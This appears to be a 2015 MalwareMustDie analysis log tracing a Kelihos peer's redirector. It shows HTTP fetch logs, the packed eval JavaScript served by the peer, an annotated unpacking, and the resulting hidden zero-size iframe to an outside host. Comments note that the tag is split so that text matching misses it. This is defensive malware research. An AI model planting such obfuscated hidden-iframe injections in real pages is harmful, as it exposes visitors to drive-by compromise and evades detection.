- ################################################
- #
- # Accessing specific htm redirector in kelihos peer
- # This demonstrates the redirector traffic of only one Kelihos peer
- # MalwareMustDie!
- #
- ################################################
- ---connection---
- 2015-10-17 00:35:56 http://151.0.21.237/index5.html
- Connecting to 151.0.21.237:80... connected.
- ---request begin---
- GET /index5.html HTTP/1.1
- User-Agent: booboo
- Accept: */*
- Accept-Encoding: identity
- Host: 151.0.21.237
- Connection: Keep-Alive
- HTTP request sent, awaiting response...
- ---response begin---
- HTTP/1.1 200
- Server: Apache
- Content-Length: 587
- Content-Type:
- Last-Modified: ?? 16 Ⅷ?2015 15:35:55 GMT
- Accept-Ranges: bytes
- Server:nginx/1.2.6
- Date:Fri, 16 Oct 2015 15:35:57 GMT
- Last-Modified:Fri, 16 Oct 2015 15:35:20 GMT
- ETag:"56211938-24b"
- Accept-Ranges:bytes
- ---response end---
- Saving to: '/test'
- /test 100%[===============>] 587 1.30KB/s in 0.4s
- Last-modified header invalid -- time-stamp ignored.
- 2015-10-17 00:35:58 (1.30 KB/s) - '/test' saved [587/587]
- ################################################
- #
- # JavaScript packed with an online packer...
- #
- ################################################
- // curl
- $ curl http://151.0.21.237/index5.html
- <script>eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" j=\\"0\\" f=\\"c://d.h.n.l/o.m\\">";1 5="<8";1 7="p";1 4="e";1 b="</8";1 a="e>";2.3(5);9(2.3(7+4+k+b),6);9(2.3(4+a),6);',26,26,'|var|document|write|k02|k0|1000|k01|if|setTimeout|k22|k2|http|176||src|height|117|width|board||21|php|76|tag1|ram'.split('|'),0,{}))</script>
- // beautified
- // "p,a,c,k,e,d" unpacker as emitted by common online JS packers:
- //   p = packed source, a = radix used to encode tokens, c = number of keywords,
- //   k = keyword table, e = token encoder, d = token -> keyword dictionary.
- // In this sample a = c = 26 and k is the 26-entry '|'-split list at the bottom; the
- // trailing 0 and {} are the initial e and d. The unpacked source is then eval'd.
- eval(function(p,a,c,k,e,d)
- {
- // Encode an index as a base-36 token (the form the tokens inside p take).
- e=function(c)
- {
- return c.toString(36)
- };
- // NOTE(review): presumably a feature test for function replacers in String.replace
- // (''.replace(/^/,String) yields '' when the callback is invoked). When it passes,
- // d is filled once and the per-keyword loop below collapses to a single regex pass.
- if(!''.replace(/^/,String))
- {
- while(c--)
- {
- // Token -> keyword; an empty k entry means the token stands for itself.
- d[c.toString(a)]=k[c]||c.toString(a)
- }
- // k[0] becomes a lookup into d and e() now matches any whole word, so one pass suffices.
- k=[function(e)
- {
- return d[e]
- }
- ];
- e=function()
- {
- return'\\w+'
- };
- c=1
- };
- // Replace every whole-word token in p with its keyword.
- while(c--)
- {
- if(k[c])
- {
- p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])
- }
- }
- return p
- }
- ('1 k=" i=\\"0\\" g=\\"0\\" j=\\"0\\" f=\\"c://d.h.n.l/o.m\\">";1 5="<8";1 7="p";1 4="e";1 b="</8";1 a="e>";2.3(5);9(2.3(7+4+k+b),6);9(2.3(4+a),6);',26,26,'|var|document|write|k02|k0|1000|k01|if|setTimeout|k22|k2|http|176||src|height|117|width|board||21|php|76|tag1|ram'.split('|'),0,
- {
- }
- ))
- ################################################
- #
- # the unpacked script....
- #
- ################################################
- // Attribute string of the hidden frame; width/height 0 keep it invisible.
- // NOTE(review): `board` is not a standard iframe attribute (possibly a typo for `border`).
- var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://176.117.76.21/tag1.php\">";
- // The tag name is split across k0/k01/k02 (opening) and k2/k22 (closing), so the literal
- // token "iframe" never appears in the source; a plain text match on "<iframe" misses this sample.
- var k0="<if";
- var k01="ram";
- var k02="e";
- var k2="</if";
- var k22="e>";
- document.write(k0);
- // document.write(...) is evaluated before setTimeout is called, so the remaining fragments
- // are written synchronously and the 1000 ms delay has no effect on the assembled markup
- // (see the "redirector result" section).
- setTimeout(document.write(k01+k02+k+k2),1000);
- setTimeout(document.write(k02+k22),1000);
- ################################################
- #
- # redirector result....
- #
- ################################################
- <iframe width="0" height="0" board="0" src="http://176.117.76.21/tag1.php"></iframe>
- ################################################
- #
- # Where does it go?
- #
- ################################################
- HTTP/1.1 200
- Server: Apache
- Content-Length: 54
- Content-Type:
- Last-Modified: ?? 16 Ⅷ?2015 15:54:40 GMT
- Accept-Ranges: bytes
- Server:nginx/1.2.6
- Date:Fri, 16 Oct 2015 15:54:44 GMT
- X-Powered-By:PHP/5.4.11
- ---response end---
- Saving to: 'tag1.php'
- tag1.php 100%[===============>] 54 122 B/s in 0.4s
- 2015-10-17 00:54:45 (122 B/s) - 'tag1.php' saved [54/54]
- $ date
- Sat Oct 17 00:56:53 JST 2015
- $ cat tag1.php
- <!DOCTYPE HTML><html><head></head><body>xxxxxxxxxxxxxxx</body></html>
- #MalwareMustDie! Analyzed by @unixfreaxjp
- [EOF]